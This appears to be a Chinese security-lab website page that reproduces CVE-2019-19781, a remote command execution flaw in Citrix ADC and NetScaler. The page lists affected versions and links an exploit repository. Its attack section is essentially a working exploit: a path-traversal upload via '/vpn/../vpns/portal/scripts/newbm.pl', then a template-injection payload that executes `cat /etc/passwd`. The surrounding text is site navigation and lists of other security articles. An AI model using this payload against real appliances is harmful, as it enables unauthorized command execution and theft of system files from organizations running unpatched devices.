CVE-2019-19781 Citrix ADC&NetScaler 远程命令执行漏洞-漏洞文库小世界-安全文库-NGC660 安全实验室

CVE-2019-19781 Citrix ADC&NetScaler 远程命令执行漏洞

好想告诉你徽章-备受喜爱-NGC660 安全实验室等级-LV4-NGC660 安全实验室1年前发布
580

CVE-2019-19781 Citrix ADC&NetScaler 远程命令执行漏洞

漏洞影响

13.x,12.1,12.0,11.1,10.5

复现过程

https://github.com/ianxtianxt/CVE-2019-19781

0x01

upload_xml (/vpn/../vpns/portal/scripts/newbm.pl)

0x02

Execute Command (/vpn/../vpns/portal/jas502n.xml)

Payload:

url=http://example.com&title=c&desc=[% http://template.new('BLOCK' = 'print `cat /etc/passwd`') %]
评分
欢迎为Ta评分
赏点小钱
分享
请登录后发表评论

    请登录后查看回复内容

用户封面
好想告诉你的头像-NGC660 安全实验室
【作业】下内网之隧道代理05.17
【作业】5.10 漏洞复现-Thinkphp+shiro550+log4j2
CSZ CMS 1.2.7 储存型xss
CVE-2019-13086 CSZ CMS 1.2.2 sql注入漏洞
CVE-2018-7662 Couchcms 2.0 存在路径泄露漏洞
Kraken:一款基于爆破技术的多平台分布式密码安全测试工具-NGC660 安全实验室
2.6W+人已阅读
Kraken:一款基于爆破技术的多平台分布式密码安全测试工具
TOP1
挑战亚马逊微软云市场“一哥”地位,谷歌拟54亿美元收购网安公司Mandiant-NGC660 安全实验室
挑战亚马逊微软云市场“一哥”地位,谷歌拟54亿美元收购网安公司Mandiant
2年前6866人已阅读
TOP2
HTB靶机渗透系列之Sniper -NGC660 安全实验室
HTB靶机渗透系列之Sniper 
2年前5898人已阅读
TOP3
Webshell管理工具流量检测研究:chopper、蚁剑、冰蝎、哥斯拉-NGC660 安全实验室
Webshell管理工具流量检测研究:chopper、蚁剑、冰蝎、哥斯拉
2年前1663人已阅读
TOP4
微软去年拦截了数百亿次暴力破解和网络钓鱼攻击-NGC660 安全实验室
微软去年拦截了数百亿次暴力破解和网络钓鱼攻击
2年前1552人已阅读
TOP5
【初级】Next.js目录遍历-NGC660 安全实验室
【初级】Next.js目录遍历
2年前1470人已阅读
TOP6
【初级】WP Statistics SQL注入 (CVE-2022-25149)-NGC660 安全实验室
【初级】WP Statistics SQL注入 (CVE-2022-25149)
2年前1113人已阅读
TOP7
【初级】artifactory 未授权访问-NGC660 安全实验室
【初级】artifactory 未授权访问
2年前916人已阅读
TOP8
【初级】jira 未授权访问-NGC660 安全实验室
【初级】jira 未授权访问
2年前889人已阅读
TOP9
网络安全应急响应工具包合集-NGC660 安全实验室
网络安全应急响应工具包合集
1年前874人已阅读
TOP10
圈子开耕者
分类-最近更新-NGC660 安全实验室 12.8W+
最近更新
最近更新文章...
468篇文章更多文章
APT37针对韩国外交部下发RokRAT
1年前
SubOver:一款功能强大的子域名接管测试工具
1年前
如何使用53R3N17Y完成主机网络侦查和信息收集任务
1年前
暗网深度调查:Google Play恶意软件的供求生意
1年前
如何使用DragonCastle从LSASS进程中提取NTLM哈希
1年前
分类-安全新闻-NGC660 安全实验室 2.3W+
安全新闻
分享安全时事,安全新闻播报推送
86篇文章更多文章
APT37针对韩国外交部下发RokRAT
1年前
暗网深度调查:Google Play恶意软件的供求生意
1年前
探析人工智能对网络安全的真正潜在影响
1年前
微信闪退BUG:一张神奇的二维码图片
1年前
印度跨国银行遭遇数据泄露,数百万敏感数据被公开访问
1年前
发布文章发布尘埃
扫码添加微信-NGC660 安全实验室
在手机上浏览此页面